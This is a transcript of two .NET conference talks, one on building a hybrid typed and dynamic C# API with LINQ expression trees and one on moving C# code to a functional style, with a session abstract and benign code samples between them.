because it really looks scary. In fact, when you start working with it, it's not that scary. Yes, there is a lot of open source code around which you can use as an example. And my project is also on GitHub. So if you spend some time on it, then in return you will get very, very good expressiveness, because in many cases a DSL that uses LINQ expression trees is much better at expressing your intent. The previous talk was about Elasticsearch, and of course one of their examples was a LINQ provider for Elasticsearch. Because whatever search type you implement, LINQ will work very well, and it doesn't even have to be search. Most of the things which we are doing, a lot of it, is getting some typed data using some criteria. So LINQ expressions are very good for implementing that.
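A rough reconstruction of the typed usage just walked through (exact signatures may differ from the GitHub project mentioned at the start):

var command = new CommandBuilder()
    .From<Companies>()                                     // the non-generic builder hands back a generic one
    .Where(x => x.CompanyName == "Dynamicsoft" && x.Year > 2000)
    .OrderBy(x => x.CompanyName)
    .Select(x => x.CompanyName, x => x.Year)
    .Build();                                              // parses the expression trees and emits the SQL text

// Anything that doesn't exist on Companies fails to compile; that is the point of the typed version.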
This is an example of link expression tree, which probably shows why there are so many nodes, node types. So above, you will see an example of link expression, and this is how it's represented internally. So there are 12 nodes and four of them leaves, and you start from lambda, then go to end, which is actually called end also, greater than, less than, member access, which member accesses to access properties, constant, to access constant values, which are in red, and so on. So it actually makes a lot of sense once you start digging into it, and there are some things to remember. One of them is that you will probably want to convert C sharp functions to your DSL functions. For example, if it's sql, you will want to support stuff like len in SQL, which corresponds to string length, in C sharp, so you will need some function maps. You will need to interpret operations. So you will have to plan to list all supported operations, functions in your DSL, and then map from link expressions how you would interpret them. You don't need to support everything. You can just throw exceptions if you're not supporting them. So just to give you a little insight about how this can work. So this is an example of the project. And go to solution. I will probably need to... Yeah, this is solution, and you see this SQL command builder. This is typed version. And tests. And you see most of the typed version is about expressions, how to deal with them. So if you look at function mapping, for example, these are my functions. On the left side, you see C sharp functions and how I map them to SQL. The core of the expression parsing is that I go through this... Here I manage my expression trees. So parse member expression, parse call expression. So yes, it's... This file is about, I guess, 150 lines of code. But if you see what happens when we try to debug the tests, you will soon get picture of what's happening. So here we have where expression. And this is expression x company name equals dynamic soft. So we can... What we can do, we can step in. We're stepping in, parse link expression. Okay, parsing begins. Not type. This is a binary expression. So we're parsing binary expression and so on. The left expression here is company name, right expression, dynamic soft. So we just continue that way until everything is parsed. And then we reach the build phase. Here actually we have a command already built because I overloaded two strings and now it actually shows what we will get. But here's the builder. And it's more or less what I showed in that slide. We have string build and we just can continue strings. So the most demanding thing, of course, is link expression parsing, but it's very powerful thing. And if your DSL is rich enough to justify this work, I really recommend to have a look at that. So this is type command builder workflow. So we take from and some table name. We assign the type and generate generic builder. Then we assign where expression. And we convert it to our custom expression, which is command expression, and we build. So we actually are halfway through. So now we have a type command builder. So now the interesting part, how we add something to it so it will magically consume dynamic clients. So what is left now is if you look at type command builder, you remember that stupid examples of using dynamic object, which I showed you, that you just type word dynamic and then compiler doesn't care. So you actually, you can send your dynamic objects right here. And compiler won't care. 
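Back from the debugger, the core of that expression walking boils down to something like the simplified parser below. This is a reduction of the idea, not the project's parser, which maps functions such as string.Length to LEN and covers many more node types:

    using System;
    using System.Linq.Expressions;

    static class WhereClauseParser
    {
        // Turns x => x.Name == "DynamicSoft" into "Name = 'DynamicSoft'".
        public static string Parse<T>(Expression<Func<T, bool>> filter)
        {
            return ParseExpression(filter.Body);
        }

        private static string ParseExpression(Expression expression)
        {
            switch (expression.NodeType)
            {
                case ExpressionType.AndAlso:
                    var andExpr = (BinaryExpression)expression;
                    return ParseExpression(andExpr.Left) + " AND " + ParseExpression(andExpr.Right);
                case ExpressionType.Equal:
                    var equalExpr = (BinaryExpression)expression;
                    return ParseExpression(equalExpr.Left) + " = " + ParseExpression(equalExpr.Right);
                case ExpressionType.MemberAccess:
                    return ((MemberExpression)expression).Member.Name;
                case ExpressionType.Constant:
                    return "'" + ((ConstantExpression)expression).Value + "'";
                default:
                    throw new NotSupportedException("Unsupported node: " + expression.NodeType);
            }
        }
    }

Back to those dynamic objects the compiler happily lets through.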
They will compile, but they will fail. Because the challenging part is that nobody knows how to map your dynamic expressions to link expression trees. And the solution to that, if you implement overloads for your interface, which will also take not just link expression, because we don't have control over.NET expressions, but it will also take overloads, which will take our command expression. So this code will become possible. So let's recall our strategy and we are somewhere in between. So now we are about subclassing our custom expression. So but before we do that, we need to enhance our command builder. So we start overloading methods. So our first non-generic command builder had only one method. Now it has two. And the second one takes command expression. The same goes for generic command builder. You see the number of methods doubled. But the operation set is still the same because these are just method overloads. We as developers, we never care how many method overloads certain interface or class has as long as everything happens for us smoothly and we don't need to explicitly make a choice. So where we'll have two methods. So type client will use the first one and dynamic will use the second one. And it's compiler who will make a choice for us. The same goes for order by. The same goes for select. And you can see that in case of order by and select the overload, actually takes an array of command expressions. So we can write a list of dynamic expressions and compiler will choose that overload. And adding method overloads and implementing them actually is trivial because our original typed version already includes code which is shown in the first method implementation. We take link expression and we convert it to our custom expression. And since in case of dynamic client, it's the second overload in walked, which already takes our command expression. We don't need to do anything. We just assign it to our command. What is less trivial is to add this conversion magic because we have to convert this dynamic expression stuff into our command expression. And usual or traditional implementation of dynamic objects is to subclass.net built in dynamic object helper. It won't work for us because we want to subclass command expression and C sharp doesn't support multiple inheritance. So what we'll need is to implement interface I dynamic meta object provider. And then we can subclass our command expression. But believe me, it's not much more lines of code, which I'm going to show you right now. So if you look at dynamic version, which is the project here, yeah. So there is a just to enlarge it. So this is the old like first typed version is almost untouched. We just needed to add some overloads for interface. But there is a new project here, SQL command builder dynamic. And by the way, if you look at what it supports, you see that it supports dot net framework for two at five in this eight in this four, so eight, the marine Android, the marine where I S. Well, when it works on I S finally, currently, it won't work in our S, but support is already there. So it's portable class library. And if you look at the content of it, it's all it's those 76 lines of code, which I mentioned, which basically what they do is they implement some binding functions bind get member bind set member. What these functions do is whenever there's dynamic expression coming to us, C L R gets lost. Okay, there's something dynamic. What what how would I deal with that? We have to answer this question. 
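In code, answering that question looks roughly like the compressed sketch below, not the library verbatim: because CommandExpression is already the base class, DynamicObject is unavailable, so the wrapper implements IDynamicMetaObjectProvider itself.

    using System.Dynamic;
    using System.Linq.Expressions;

    public class CommandExpression
    {
        public string Name { get; protected set; }
    }

    public class DynamicCommandExpression : CommandExpression, IDynamicMetaObjectProvider
    {
        public DynamicCommandExpression() { }
        public DynamicCommandExpression(string name) { Name = name; }

        public DynamicMetaObject GetMetaObject(Expression parameter)
        {
            return new MetaObject(parameter, this);
        }

        private class MetaObject : DynamicMetaObject
        {
            internal MetaObject(Expression parameter, DynamicCommandExpression value)
                : base(parameter, BindingRestrictions.Empty, value) { }

            public override DynamicMetaObject BindGetMember(GetMemberBinder binder)
            {
                // "x.Companies" lands here with binder.Name == "Companies"; we answer
                // by building a new, statically typed expression from that name.
                var ctor = typeof(DynamicCommandExpression).GetConstructor(new[] { typeof(string) });
                var create = Expression.New(ctor, Expression.Constant(binder.Name));
                return new DynamicMetaObject(
                    Expression.Convert(create, binder.ReturnType),
                    BindingRestrictions.GetTypeRestriction(Expression, LimitType));
            }
        }
    }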
Okay, I recognize that and I return this and return our typed object. If we don't answer this question positively, then exception will be thrown. So let's have a quick look at unit tests and then the same test we will run it in debugger in dynamic version. Oops. Let me see type. Okay, it's type test. I have to run dynamic dynamic tests. Yeah. So it stops here. And get member and here we have some binder. What is binder? Yeah, and you can probably here is seed here. And if it's too small, I can tell you that this says companies. So we have a binder with the member companies. So which mean that there was some statement which says X dot companies and then they are and C L R they get both lost. So we have to say what to do with that. So what we're doing here is that we create expression constant from binder name. So this is because we converted to our custom expression based on binder name. So we continue doing that with all other expression that we receive. And then we see that the test passed. So there is a very small chunk of code where we implement the handling of incoming expressions. And it's a relatively inexpensive thing. So you just have to interpret according to domain language. You might check catalog of your database tables, for example, and throw exception if you find something that you don't encounter. So and in case of dynamic command builder, the last part is just follow type builder workflow. But we begin from a different place. We start from dynamic expression. We try compiles selects us command expression based overload and we do conversion. And then we continue just as it was type command builder. Now we're finished with SQL command, hybrid command builder. But there is one other aspect of this. How should we deal with return values? Because when we're sending data in, it's understandable. We have some expressions. We map them, convert them, and then we have this hybrid API. But what if we have dynamic clients and type clients? And type clients will expect types of companies and while dynamic clients will expect some dynamic object. And to show how this can be done, I extended this project with command processor, which is very simple. It just has a couple of methods. Find one and find all. And this is how it's used in typed version and dynamic version. So, and apparently there are some extra extensions to our dynamic wrapper we need to add. Both for returning typed results and for returning dynamic results. First we're going to type the results. If we want to convert whatever execution engine returns to us, we need to have some extension method that will map it to our empty object. Because whatever database engine you're using, it's doing its work using some internal data. If it's MongoDB, it will be a BISON. If it's SQL Server, it will be a table of data streams. But it doesn't know anything about your types. So you will have to do some work. And this is done by implementing reflection-based conversion. So I have a couple of extension classes, two object of T, which actually fixes that. And so I can get companies and collection of companies when I send and execute the query related to retrieving companies. Unfortunately, this is not sufficient for dynamic clients to be as smooth as typed clients. Because if I don't have any typed objects in my dynamic client, then I will get some additional string of object or whatever internal type my execution engine operates with. And also I would like to be able to fluently convert to typed versions from dynamic client. 
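The reflection-based conversion mentioned above, in its simplest possible form, assuming the execution engine hands back rows as IDictionary of string to object; the real extension no doubt handles nulls, type coercion and so on:

    using System.Collections.Generic;

    public static class ResultExtensions
    {
        public static T ToObject<T>(this IDictionary<string, object> row) where T : new()
        {
            var result = new T();
            foreach (var property in typeof(T).GetProperties())
            {
                object value;
                if (row.TryGetValue(property.Name, out value) && property.CanWrite)
                    property.SetValue(result, value, null);
            }
            return result;
        }
    }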
So in a similar way with command builder, we have command processor that has overloads. And instead of returning row data, we encapsulate our results in result row and result collection. And we also introduce dynamic result row, dynamic result collection. And likewise with command builder, for clients, it's all unnoticed. Clients will just use them as everything flows naturally. You can see here that dynamic client is now fine. So you can get dynamic results. You have var result, which will probably get dynamic object. And you have also typed result. And what will happen is that our dynamic wrapper will again call another bind function to try to convert it to whatever type we supply. So just to give you a quick insight on how this might work. So I'm now on this project. And if I look at my dynamic projects, you will see that there are three classes. We used to have only dynamic command expression. Now we have dynamic result collection, dynamic result row. And this is because we need to implement these small conversions. If you look at dynamic result row, for example, you will see there is a method bind convert. So what happens is that when there is an attempt to convert dynamic object back to static type word to company or collection of companies, we will get a method called here saying, okay, this is a request to bind to convert. I can show you actually with some unit tests. Let me see here dynamic test and execute find one S type. So this probably should hit that break point. Yeah, it did. So there is a binder here. And you can see that the binder says return type companies. So this return type is completely unknown to us. So we get a request. Somebody is trying to cast your dynamic object to companies. And we can, since we have a type, we can check what properties we have there. Maybe it's a good match. And if we receive from the database stuff with name, first name, last name, and there are matching properties in that type, we will try to convert. So type command processor workflow is simple. You have a sending command as before. And then, but you're also trying to get results back. So we execute processor, get execute, get results. And then we have some internal data type. In this case, I dictionary of object, just for the demo purpose, which is converted using some extension method to object of T. And in case of dynamic processor, there is a conversion to object of dynamic result collection. And then there will be hit bind convert method in our dynamic wrapper to convert it to other types if necessary. A couple of words about cross platform portability. As I said, these libraries, I implemented a sport of course libraries and work on all modern dot net platforms. And they don't have any other external dependencies. So they are just a row and can be used as example of how you can implement this stuff. Of course, legacy platforms out of the picture because they don't have support for dynamic stuff, but you can use type version and deploy it on civil light for clients. So you can be selective with what you deploy on each platform. Just to give you, let me see, idea of how it might work here. I have a, oops. What happens? Well, you see anything? Sorry for that. But I, excuse me, I may need some help. Okay. It's coming something. Okay. Yeah. Yeah. You know. It probably heard word cross platform. So then it gets scared. I wonder why it's that. Okay. Let's try anyway. So I want to deploy it on. That is strange. Can it be something with a cable? No. It just keeps resizing things. 
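While the projector sorts itself out, here is roughly what that BindConvert idea amounts to, written as a simplified stand-alone result row. It uses DynamicObject for brevity, since a result row, unlike the command expression, has no base class competing for the inheritance slot:

    using System;
    using System.Collections.Generic;
    using System.Dynamic;

    public class DynamicResultRow : DynamicObject
    {
        private readonly IDictionary<string, object> data;

        public DynamicResultRow(IDictionary<string, object> data) { this.data = data; }

        // row.Name, row.Address, ... read straight from the underlying data.
        public override bool TryGetMember(GetMemberBinder binder, out object result)
        {
            return data.TryGetValue(binder.Name, out result);
        }

        // Honors casts such as (Companies)row or assignment to a typed variable.
        // binder.Type is the requested target type, assumed to have a default constructor.
        public override bool TryConvert(ConvertBinder binder, out object result)
        {
            result = Activator.CreateInstance(binder.Type);
            foreach (var property in binder.Type.GetProperties())
            {
                object value;
                if (data.TryGetValue(property.Name, out value) && property.CanWrite)
                    property.SetValue(result, value, null);
            }
            return true;
        }
    }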
So if you go back to show point, it looks fine. If I go to visual studio. Okay. Try to deploy. So what I'm doing now is I'm deploying it to the Android simulator. I also have Windows phone and IS. Okay. It's deployed. Yeah. Probably while you hear it, it works better. But hopefully it will work. Okay. Ask or come on, build a test. So let's start it. And I will start in a few seconds run test. So this is just a small test. I just want to test runner which runs tests and both typed and dynamic and there are 28 tests passed. I've also the same I did for Windows phone and for IS. I will not take chance on running our simulator. Now because I have to switch to native modern Mac. So you have to believe me. This is a screenshot. I haven't made it up. It's just a real screenshot. But you will see that there are a few tests because I had to exclude all dynamic tests. But typed tests work. So this stuff is proven on all modern platforms as long as dynamic is supported. So conclusion. Yes, it takes some extra effort to design API properly. But if you really want expressive API, you will find that benefits will outweigh, may outweigh some extra effort. And also as you saw, the number of line of codes you need to reach both dynamic and typed clients is really not that big. So if you have a library that can be exposed for dynamic clients, I would recommend to use this approach which doesn't need to work with link expression trees. You can actually create your own classes. But with link expression trees, you gain some additional expressiveness. So the moral make hybrid API and not hybrid war. And while we have a few minutes to go, since it's now Friday and it's late, so I want to give you a little boost. And I invite you to sing along with me a karaoke song about the material which we have just gone through. So this is inspired by song by Queen. I'm going slightly mad. And of course, if you have song with such lyrics, you can tweak it to sing about anything. And it's a new variation. It's called I broke my static types. I'll try to sing like Freddie Mercury. I'll try to sing like Freddie Mercury. I'll try to sing like Freddie Mercury. I'll try to sing like Freddie Mercury. I'll try to sing like Freddie Mercury. I'll try to sing like Freddie Mercury. And I have only one chance left to find all my code at runtime. It won't be run until Monday. And by the time I'll be free running through yellow daffodils, climbing on a banana tree. I broke my static types but I wrote dynamic code. It finally happened. It happened. It finally happened. It finally happened. Dynamic code. So this is summary of our hybrid advanced strategy. You just expose static type API. You implement your dynamic extensions in different assemblies where you only deploy it on the platform that supports. And then everything will go fine. I'm calling now funny message. My brother just wheeled it through. I import system dynamic this days. But my dear how about you? I wrote dynamic code. And you should write dynamic code. It finally happened. It finally happened. Oh yes, it finally happened. Dynamic code. It's all dynamic code. And there you have it. Thank you very much. I'm Bagif, working for Miles. I hope you have enjoyed the conference. I wish you great weekend and bon voyage if you came from different place. Thank you. And I'm probably open for some questions if you have any. Does it feel something that you might find applicable in your projects? With some DSLs? If you find something, take contact with me. And I will try to help you out. 
Thank you. Thank you. Thank you.
|
Now that we can declare dynamic objects in C#, how should we define our APIs? Typed, dynamic, mixed? In this session we will learn that sometimes it's useful to create an API in two incarnations: a strongly typed one and a dynamic one. Such an API can be adopted by developers with either preference and exposed to .NET platforms that lack DLR support. We will study the principles of designing a dual API, demonstrate how to ensure maximum code sharing between the typed and dynamic versions, and show how to package and publish library files so they can be consumed on a variety of .NET platforms, including iOS and Android. We will also talk about the added value that dynamic support brings to C#, looking at real-world examples such as dynamic view models, micro-ORMs and REST services. Last but not least, we will build and run code samples on Windows and Mono.
|
10.5446/50875 (DOI)
|
All right. Well, good morning. Welcome to the session on transforming your C sharp code to functional style. My name is Venkat Subramanyam. We're going to talk about some of the principles behind functional style of programming and how we could write more functional style of code. I know this is a fairly tall room here, but if you do have a question, I hope you do. I really like an interactive session. Please do raise your voice. Maybe you can say, hey, question, and then you can ask a question. I will have trouble seeing you, but I'll try my best to put my hands like this when I have to see. Now I can see you when I do that. So do ask questions, make comments, anything you have. Definitely, I would really appreciate you asking questions or making comments along the way. I really enjoy hearing from you and not just let me talk for an hour. So let's get started. What I'm going to do here today is I want to talk a little bit about functional style of programming, and then I want to look at some code examples. And one of the reasons for me to give this talk is I work with a number of companies, mostly on consulting projects. I do a lot of code reviews, help with design, help with architecture, help with test driven development, things like that. And when I do this, what I notice is programmers who have used C plus was for a number of years tend to use it the way they are used to. And even though C sharp has some really functional style of programming facilities in it, they haven't quite switched over to using it. And even when I work with them in creating design, I myself fall into the trap, and then it takes a bit of time to realize we could actually do this a lot better. So I'm going to go through some examples to look at how we can make the transition. But first of all, I want to start with the question, what's functional style of programming? Why do we really care about it? Functional style of programming is very declarative in nature, rather than working with the code at a very low level, where we tend to say every single step of what we want to do and how to do it, we instead can focus on simply telling really what to do and let the code figure out the details of how to do it. So it becomes a lot more easier. In fact, if you want to think about it this way, it is raising the level of abstraction so we can communicate better with the computer that's going to execute this code. It contains those things called higher order functions. And I'll talk about these again when we get to the code examples. So what's a higher order function? Now, we are used to doing a couple of things in C sharp. We are used to pass objects to functions. We are used to creating objects within functions. And we are also used to returning objects from functions as well. We can do exactly those with functions now and not just with objects. We can pass functions to functions. We can create functions within functions. And we can return function from functions as well. And those kind of functions that can accept and return functions are called higher order functions. We want to honor immutability. Now, mutability is one of those things that cause enormous amount of pain. Now, where does pain really come from? Well, what about mutability? Well, mutability is something we have done for a very long time. I mean, how bad could that be? So we kind of ignored it for a minute. But what about sharing? Well, sharing is a good thing, right? Because remember what mom told us, sharing is good. So sharing is good. 
Mutability is all right. But shared mutability is devil's work. And the minute you bring shared mutability together, all kinds of things go wrong in the applications. And to develop application with fewer errors and easier to understand, we want to really focus on immutability. And that leads to what are called pure functions. Pure functions are functions with no side effect. Now, here's one of the disadvantages, I think, in languages like C sharp, which have been created the old way or the object oriented way to be precise. And then, of course, we are mixing the functional style to it. And that causes some problems. So it is on us, the programmers, to make sure we don't write functions, the anonymous functions, the lambda expressions. And then in those functions end up actually modifying outside variables, even though the language, unfortunately, lets us do it. So it's not the question of what can we do in the language? It's more of a question of what should we be doing in the language? So we should focus on pure functions. Pure functions are functions that do not modify any external state and are not affected by any external state while it's running. And it doesn't modify any state as well while it is running. But why should we do any of these things? And the reasons are it can make the code concise. Who here wants to write a lot of code? Nobody, right? When you're young and naive, you want to write a lot of code. As you become an experienced programmer, you work to avoid writing code, right? Because the code you didn't write has the fewest bugs hands down. So it's a code that's concise. But don't confuse conciseness with terseness. They are not the same. A terse code is short and stupid and ready to hurt you. A concise code is transparent. You can see through it. It's short and easy to understand. So you want to definitely write concise code. A code that is expressive, it begins to read like the problem statement so we can know what it's doing right off the bat. And of course, less code is definitely good. It is a code that's easier to understand once we get comfortable with the syntax. It is easier to modify. After all, one of the things we really care about is maintainability of code. And a code that is easier to modify and maintainable is definitely something more welcome. It contains fewer bugs. Why would it have fewer bugs? It contains fewer bugs because there are fewer moving parts in the code. And as a result, it's got fewer bugs. It's also because it's more transparent. It ends up having fewer bugs as well. And it's very effortless to paralyze the code and make it efficient as well. We'll take a look at some of these features along the way. But if you ask me what's the biggest change, well, sure, the languages have changed. Today, there's no real mainstream language, I would say, ignoring C that doesn't have functional silo programming. But the biggest change in this silo programming is in the programmer's mind. We have to retune ourselves in the way we write it. So let's look at some examples of this. Let's start with iteration for a minute. Let's say I'm interested in taking a list of values, we'll say numbers, and I want to say new list, and I've got some integers on my hand. Let's just throw in together these specific values to work with. Now, I'm sure everybody here who has written code in C sharp had to iterate through some collection at some point. Almost every day we do this, right? So how would we go about doing this? 
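Two tiny illustrations of the ideas above before we get to the loops: first a higher-order function that both takes and returns a function, then the pure-versus-impure distinction the compiler will not enforce for us. This is a minimal sketch, not code from the talk:

    using System;
    using System.Collections.Generic;
    using System.Linq;

    class FunctionalBasics
    {
        // Accepts a function as a parameter.
        static int ApplyTwice(Func<int, int> transform, int value)
        {
            return transform(transform(value));
        }

        // Creates and returns a function from within a function.
        static Func<int, int> MakeAdder(int amount)
        {
            return x => x + amount;
        }

        static void Main()
        {
            Console.WriteLine(ApplyTwice(MakeAdder(3), 10));   // 16

            var numbers = new List<int> { 1, 2, 3 };

            // Impure: the lambda reaches out and mutates shared state -- legal, but a smell.
            var total = 0;
            numbers.ForEach(e => total += e);

            // Pure: nothing outside is touched; the result simply comes back to us.
            var sum = numbers.Sum();

            Console.WriteLine(total + " " + sum);               // 6 6
        }
    }

With that in mind, back to how we would iterate.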
We'll say far int i equal to zero, i less than numbers dot, what is it? Is it length, size, count? Is it count? It's count. Okay, I'll trust you, count. And then what do we do? i plus plus, and then I want to output over here, and what would I output? I would output, oh, numbers, how do I get the value through i, isn't it? Okay, yeah, that worked, isn't it? What an achievement. Well, what does this do? If you are into patterns, how many of you like design patterns? Quite a few, of course. This has a design pattern name. It is called self-inflicted wound pattern, right? So we do this all the time to ourselves. How many times I've written this code and you stop and think, is this right? Now, how many times have you written this code and two weeks later, somebody tells you that code doesn't work and you say, well, that's an off by one error. Anybody who said off by one error? And how do you feel when you do, right? Life kind of sucks when that happens, right? So that's an example of, you know, a lot of times people look at this code and say, that's a simple for loop. Well, unfortunately, they haven't understood the word simple. Well, the word they're looking for is familiar. It's a familiar for loop, but I'm going to say this is one of the most complex code you can actually work with. And the reason it's complex is, a, it's got way too many moving parts in it. For doing something very simple, you had to make all that line up. And once you do that, you got to make sure the boundary conditions are right set properly. You have to do that as well. And when it comes time to make change, you got to sit back and look at it one more time. We can do a lot better than that already in C sharp without moving away. We could instead of doing this, we could simply say something along these lines, right? So we could say, instead of this, we could say, hey, how about simply doing a traditional for each that's been provided for us. So we could say for each, and then we could say element, well, we could even say var e in numbers. And we could then say, for example, output the given element. Now, notice that this produces the same result. But this is much better than the previous one, because it's got fewer moving parts. But even more important, there are a few other semantical differences we have to be very mindful of. This is something to keep in mind. For example, if I were to say i equals 44 here, just all of a sudden, for whatever reason, I decide to modify the variable, notice what happened to the loop. It just bailed out. And that's a very big smell, because i is actually a mutable variable that you are affecting the state of, you got to be very careful. That is a fairly big design flaw in the looping itself, because i shouldn't be mutable if it really was iterative index. On the other hand, if you come here and say e equals 22 or whatever, you get a compilation error saying you cannot assign to the value of e, because e is a brand new variable through the loop iteration, and that is a much better way to do it. But collectively, these two are called external iterators. So what is an external iterator? An external iterator is like having a rude dog. You say move and it doesn't budge, and you have to kind of push it a little bit every step of the way, and the point really is you have to control the entire iteration all by yourself. On the other hand, we could use what are called internal iterators. 
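Written out, the two external-iterator versions just dictated look like this, continuing with the numbers list from before; any values will do:

    var numbers = new List<int> { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10 };

    // Index based: i is mutable, so "i = 44" inside the body silently derails the loop.
    for (int i = 0; i < numbers.Count; i++)
    {
        Console.WriteLine(numbers[i]);
    }

    // foreach: e is a fresh variable each pass, so "e = 22" is a compile-time error.
    foreach (var e in numbers)
    {
        Console.WriteLine(e);
    }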
So one of the first things we would do, switching over to functional style of programming is as much as possible, abandon external iterators and favor internal iterators as much as we can work with it. So in other words, what we're going to do here is to perform this looping, we could go back here and say, I've got these numbers, but I'm going to say numbers.forEach, and for each of the numbers given to me, I'm going to go ahead and output that particular value that's being given over here. So notice this code produces exactly the same result, but this is more concise, it's more expressive as well, but it's declarative in nature. How is it declarative? In this code, for example, notice what we did. We told the far loop to take on these range of numbers and loop through it. In this case, we told the far loop to take on the numbers and loop through each one of them, extracting one at a time, our focus has been on the looping aspect. On the other hand, in this case, we simply said, I want iteration, I don't care about how you do iteration, and here is what I want to do for each of the elements in the iteration. In other words, what we did is called seeding control. We gave up control on certain part. Giving up control on certain part is a good thing because we can focus on what's important to us and let the underlying library take care of what we don't care about. But the benefit of seeding control is this loop could be sequential as it is right now, or potentially this loop could be parallel as well if it makes sense. And how do we get that option without changing a whole lot of code? We get because right there, this dot means something to us as programmers, and that word is called polymorphism. Notice that line numbers 15 and 19 are static binding. You don't get any polymorphism in that code. On the other hand, the dot online 25 says, I am polymorphic, go ahead and call me. I'll tell you what I do, but I won't tell you how I do it. At run time, I will figure out how to do it based on the context and the object I'm working with. So this can give you quite a bit of flexibility in coding that you simply cannot so easily achieve with the other piece of code that we saw. So we look at internal iterator in this case. Now, let's think about filtering values for a minute. Now, imagine what we are told is only to pick even numbers from this collection. So how would you pick even numbers from this collection? Well, we would say var even only equals will create a new list over here of integers. And then we would say far var element in numbers one more time. And then we would say if the given number is even, then go ahead and put even only dot add. And then we would add the element. And then of course, once we are done with it, we would come out and we would say something along the lines of even only, and then we could say for each, and we could output the value that's in here that we are interested in outputting. So this example is about, oh, wait a minute, line number 16 I messed up. So this is a for each, of course, there we go. So you can see how we were able to do this code to only grab even numbers. Now, what did we do in this case? We use the good old for loop one more time. So at the first thought, you may say, this for loop looks really powerful. I can use it for so many things. I call it the jack of all force, right? Though this is like you hit a knock on the door, you open the door, a guy stands with a hammer and says, I'm here to fix your kitchen. And you'll be a little suspicious. 
You would say all that you have is a hammer is that really nice thing to do. And you don't want to use one tool for everything. And so using a for for everything is a sign of smell. But instead, we want to use different tools. A guy more professional walks in with a little bag, he's got a chisel, a little screwdriver in it, maybe other things that he wants as a tool. And you're asking me if he's going to use all these tools. He says, no, of course not. I'm going to use the tool that's right for the job I'm going to do. But I'll be very selective in what I use. So that is one of the biggest differences here. But look at this code for a minute. What did we do? We patiently first created an empty collection. Then we loop through one element at a time. Then we examine the element. Then we added the element to the other collection. We had to do every single step of the work we had to do. Anybody who has written code like this before? Everybody in this room, right? How do you feel when you write this code? Dirty, right? That's how you should feel. In fact, when you go home, if the kids come running to you, you say, don't touch me. I got a shower first, right? That's how you feel that I've been doing a dirty job all day. It's even worse for people who work from home. If a kid runs in while you're writing this code, you got to immediately close the laptop. Otherwise, the kid looks at this and says, that's what you do for a living, and they don't want to take after a profession, right? So this is a very low-level, really primitive code. In fact, that's what it's called. This is called primitive. So this is called primitive obsession. So we go through a lot of primitive obsession. So when you write C sharp code, stop for a minute and ask yourself, is that a primitive obsession that I've been held on to? Maybe it's time for me to free myself of that primitive obsession. So let's see how we can rewrite this code now. So what I'm going to do here is I'm going to take this away from here for a minute. Let's actually comment it out for a minute so we can look at it. So now what I would like to do here is try this out in a more of a declarative style. So what am I going to do? I'm going to say numbers. And in this case, we're going to use a where method in C sharp, given an element where the element is even. So that completely extracts even numbers for us. And the next thing I'm going to do here is convert it to a list over here. And then I'm going to say for each of these elements, go ahead and print out. Actually, let's short circuit this just a little bit for ourselves. And I'm going to simply say print that element for me. And we can ask it to print those values out. So you can see how in this case, we accomplish the same task, but with a lot fewer lines of code, but more important, more than lines of code, I really appreciate the expressiveness of the code. If, for example, if I show you this code and ask you, what does this code do, you tell me, wait, wait, let me try to figure it out. Right? Now, on the other hand, when you look at this code, you say, let me read it. Given a collection of elements, only pick up what are even and then print them out. So the code ends up beginning to read the problem statement. And so it becomes easier to work with. So that is an example of how we went from an imperative style to a functional style using the where method. And that really helps us to filter out elements. So once again, as you are writing and working with collections, we do this also all the time. 
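The before-and-after for the filtering example, written out with the same numbers list (Where and friends come from System.Linq), plus a peek at the parallel point the talk makes shortly after this:

    // Imperative: create, loop, examine, add -- every step by hand.
    var evenOnly = new List<int>();
    foreach (var e in numbers)
    {
        if (e % 2 == 0)
        {
            evenOnly.Add(e);
        }
    }
    evenOnly.ForEach(e => Console.WriteLine(e));

    // Declarative: say what, not how.
    numbers.Where(e => e % 2 == 0)
           .ToList()
           .ForEach(e => Console.WriteLine(e));

    // The same shape parallelizes with barely a change; with PLINQ that is roughly
    // the following (a sketch -- output order is no longer guaranteed):
    numbers.AsParallel()
           .Where(e => e % 2 == 0)
           .ForAll(e => Console.WriteLine(e));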
We end up writing code where we got to take a collection of objects, and we have to do something with only a small set of objects. And we can write in a functional style rather than going through the original for loop. Our minds are wired with the for loop only because we are familiar with it, not because that is a better way of programming, and it is a retuning of our mind to start using this a little bit more. So we looked at the filtering operation, but it is a good time for us to compare nodes about this imperative and declarative style. In the imperative style of programming where we saw in the top, to the more of a declarative style of programming in the bottom, every declarative style is not necessarily functional, but functional style is declarative. So think about this as that is declarative style of programming, and this is functional style of programming. You can be declarative and non-functional, but functional style is declarative in nature. So that is one of the biggest benefits of writing functional style of code. So what are the differences? In the case of imperative style of coding, we got to specify every single step of what to do and how to do it. In a functional style of code, we are more directive, we focus on only the what and not on the how to do it. So in other words, rather than getting into the muddy details of every single step, we just told, given a collection, pick even, print it out. So the point is, we are able to focus on a higher level of detail abstraction rather than the muddy detail low-level programming. In a way, the top one looks like talking to a toddler. Imagine you have a toddler, and the toddler wants to get you something. What do you do? You say, sweetie, stand very carefully, walk every step, look where you're walking, don't look elsewhere, hold your both arms. You got to say every single step of detail. The bottom code, which is declarative, feels like you are talking to an adult. Well, okay, on a second thought, it feels like you're talking to a responsible adult, right? So that is the whole idea, is that you are able to be directive and say, just do that for me, and you don't care about how it's actually being done. You have mutability versus immutability. Did you notice on line number 15, you created a variable. On line number 18, you continuously mutated it with values over and over and over. I did not turn up the volume of my computer, but if I had the volume up, you would actually hear this variable say, ouch, ouch, ouch, on this line of code, because you're continuously mutating that variable. So you typically do mutation in imperative style, but notice there is no explicit mutation in this code at all. We're not manipulating any variable. We are simply writing a pure function. The pure function is right there, which says, just tell me if this element is even or not. That's purity. It doesn't modify anything. It simply gives you a result of a true or false. That's all it does. Sure enough, this is a bit of an impurity, and that's one of the reasons why you could argue C sharp quite directly didn't provide it on the collection. It had to give it on the list itself. So that's a bit of an impurity, but this one definitely is purity, where we only perform an operation and give you a result rather than mutating stuff, and it's expressive. We are deliberately specifying what we want to do and not focused on how to do it, and we see cd control to the lower API to do that. So we don't have any side effects, and as a result, it can enjoy purity. 
